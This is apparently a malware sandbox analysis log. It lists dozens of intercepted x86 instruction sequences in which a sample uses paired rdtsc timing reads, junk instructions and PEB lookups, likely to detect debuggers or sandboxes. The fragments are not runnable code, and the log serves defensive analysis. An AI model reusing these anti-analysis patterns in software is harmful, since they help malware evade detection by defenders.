Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1100C4B second address: 1100C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1100C58 second address: 1100C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1100DC8 second address: 1100DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1DECBA0FD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 110696E second address: 1106983 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1DED52754Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jl 00007F1DED527546h 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 110DAE7 second address: 110DAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push edx 0x00000008 js 00007F1DECBA0FD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 110F84C second address: 110F854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 110F854 second address: 110F85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 110F85C second address: 110F862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 110F862 second address: 110F871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F1DECBA0FD6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1114C4C second address: 1114C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1114C50 second address: 1114C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1114C63 second address: 1114C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F1DED527552h 0x0000000c popad 0x0000000d push eax 0x0000000e jng 00007F1DED52754Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 111992A second address: 1119943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1119943 second address: 1119949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1119949 second address: 111995F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1DECBA0FE1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1121CC7 second address: 1121CCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11262AF second address: 11262B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11262B3 second address: 11262BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11262BF second address: 11262C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11262C5 second address: 11262CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11262CB second address: 11262D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1DECBA0FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11262D5 second address: 1126304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1DED527564h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1126304 second address: 1126308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11260F2 second address: 11260F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11286D1 second address: 11286D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11309D9 second address: 11309DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11309DD second address: 11309FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11309FC second address: 1130A13 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1DED52754Ch 0x00000008 je 00007F1DED527546h 0x0000000e push eax 0x0000000f jc 00007F1DED527546h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 112F9F3 second address: 112F9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 112F9FC second address: 112FA06 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1DED527546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 112FA06 second address: 112FA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 112FA0C second address: 112FA17 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F1DED527546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 112FA17 second address: 112FA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F1DECBA0FE2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 112FA32 second address: 112FA4B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F1DED527546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F1DED527550h 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11306CE second address: 11306D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11306D6 second address: 11306DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1133779 second address: 113377D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 113377D second address: 11337AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1DED527552h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F1DED527546h 0x00000012 jmp 00007F1DED527550h 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11337AF second address: 11337D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jns 00007F1DECBA0FD6h 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F1DECBA0FDCh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pushad 0x0000001c push ecx 0x0000001d push edi 0x0000001e pop edi 0x0000001f pop ecx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11337D9 second address: 11337DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11337DF second address: 11337F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1DECBA0FD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F1DECBA0FD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 11337F2 second address: 11337FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1185E81 second address: 1185ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1DECBA1003h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F1DECBA0FDDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1185A27 second address: 1185A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1DED52754Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 125409B second address: 12540AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F1DECBA0FD6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 125494B second address: 1254963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527552h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1254963 second address: 1254967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 1256442 second address: 125645D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DED527557h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 125A86D second address: 125A8C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F1DECBA0FE6h 0x0000000f nop 0x00000010 mov dx, 1BFDh 0x00000014 push 00000004h 0x00000016 jnl 00007F1DECBA0FDAh 0x0000001c mov dx, F68Dh 0x00000020 mov dword ptr [ebp+122D248Ch], ebx 0x00000026 call 00007F1DECBA0FD9h 0x0000002b pushad 0x0000002c pushad 0x0000002d push edx 0x0000002e pop edx 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 push esi 0x00000036 pop esi 0x00000037 popad 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jp 00007F1DECBA0FD8h 0x00000042 push eax 0x00000043 pop eax 0x00000044 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 125A8C5 second address: 125A8CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 125A8CB second address: 125A90E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ebx 0x0000000d pushad 0x0000000e jp 00007F1DECBA0FD6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push edx 0x0000001b push eax 0x0000001c jmp 00007F1DECBA0FE0h 0x00000021 pop eax 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F1DECBA0FDEh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430008 second address: 743001D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DED527551h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743001D second address: 74300BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F1DECBA0FDEh 0x00000011 push eax 0x00000012 jmp 00007F1DECBA0FDBh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F1DECBA0FE6h 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 mov dx, ax 0x00000023 pushfd 0x00000024 jmp 00007F1DECBA0FDAh 0x00000029 xor cl, 00000008h 0x0000002c jmp 00007F1DECBA0FDBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr fs:[00000030h] 0x00000039 jmp 00007F1DECBA0FE6h 0x0000003e sub esp, 18h 0x00000041 jmp 00007F1DECBA0FE0h 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74300BD second address: 74300C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74300C1 second address: 74300C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74300C7 second address: 74300FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 2C128161h 0x00000008 call 00007F1DED52754Eh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1DED527557h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74300FB second address: 7430158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F1DECBA0FE3h 0x00000012 pushfd 0x00000013 jmp 00007F1DECBA0FE8h 0x00000018 xor ah, 00000018h 0x0000001b jmp 00007F1DECBA0FDBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430158 second address: 7430225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov ebx, 68D4DA06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebx, dword ptr [eax+10h] 0x00000011 jmp 00007F1DED52754Dh 0x00000016 xchg eax, esi 0x00000017 jmp 00007F1DED52754Eh 0x0000001c push eax 0x0000001d pushad 0x0000001e movsx edx, ax 0x00000021 jmp 00007F1DED52754Ah 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F1DED52754Eh 0x0000002f or eax, 18B51B08h 0x00000035 jmp 00007F1DED52754Bh 0x0000003a popfd 0x0000003b mov bx, cx 0x0000003e popad 0x0000003f mov esi, dword ptr [759B06ECh] 0x00000045 jmp 00007F1DED527552h 0x0000004a test esi, esi 0x0000004c pushad 0x0000004d mov cx, F8BDh 0x00000051 call 00007F1DED52754Ah 0x00000056 movzx esi, di 0x00000059 pop edi 0x0000005a popad 0x0000005b jne 00007F1DED52855Ah 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 pushfd 0x00000065 jmp 00007F1DED52754Fh 0x0000006a sbb cx, 595Eh 0x0000006f jmp 00007F1DED527559h 0x00000074 popfd 0x00000075 mov edx, ecx 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430225 second address: 743026E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1DECBA0FE3h 0x00000013 and ch, 0000001Eh 0x00000016 jmp 00007F1DECBA0FE9h 0x0000001b popfd 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743026E second address: 7430274 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430274 second address: 7430304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1DECBA0FE7h 0x00000013 adc cx, 6B8Eh 0x00000018 jmp 00007F1DECBA0FE9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F1DECBA0FE0h 0x00000024 adc ecx, 0D356E08h 0x0000002a jmp 00007F1DECBA0FDBh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, edi 0x00000032 pushad 0x00000033 mov dh, al 0x00000035 mov ax, di 0x00000038 popad 0x00000039 call dword ptr [75980B60h] 0x0000003f mov eax, 75F3E5E0h 0x00000044 ret 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430304 second address: 7430308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430308 second address: 743030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743030E second address: 743031C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1DED52754Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743031C second address: 743036B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DECBA0FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000044h 0x0000000d jmp 00007F1DECBA0FE6h 0x00000012 pop edi 0x00000013 pushad 0x00000014 jmp 00007F1DECBA0FDDh 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c pushad 0x0000001d jmp 00007F1DECBA0FDAh 0x00000022 mov ax, EDB1h 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 mov bh, al 0x0000002b rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743036B second address: 74303DB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1DED527559h 0x00000008 add si, D3F6h 0x0000000d jmp 00007F1DED527551h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov ecx, edi 0x0000001a mov cx, dx 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f jmp 00007F1DED527555h 0x00000024 push dword ptr [eax] 0x00000026 jmp 00007F1DED52754Eh 0x0000002b mov eax, dword ptr fs:[00000030h] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74303DB second address: 74303DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74303DF second address: 74303E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 74303E5 second address: 7430404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 3AC45DC1h 0x00000008 mov al, 14h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [eax+18h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1DECBA0FDBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430404 second address: 743040A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743042E second address: 7430432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430432 second address: 743044F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 743044F second address: 7430455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430455 second address: 7430479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1DED527553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d pushad 0x0000000e mov cx, 505Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	RDTSC instruction interceptor: First address: 7430479 second address: 74304FC instructions: 0x00000000 rdtsc 0x00000002 mov esi, 361EE209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test esi, esi 0x0000000c jmp 00007F1DECBA0FE4h 0x00000011 je 00007F1E5B0A01E5h 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F1DECBA0FDEh 0x0000001e or eax, 0C086A88h 0x00000024 jmp 00007F1DECBA0FDBh 0x00000029 popfd 0x0000002a pushad 0x0000002b mov cl, 37h 0x0000002d pushfd 0x0000002e jmp 00007F1DECBA0FDBh 0x00000033 jmp 00007F1DECBA0FE3h 0x00000038 popfd 0x00000039 popad 0x0000003a popad 0x0000003b sub eax, eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F1DECBA0FE2h 0x00000044 rdtsc
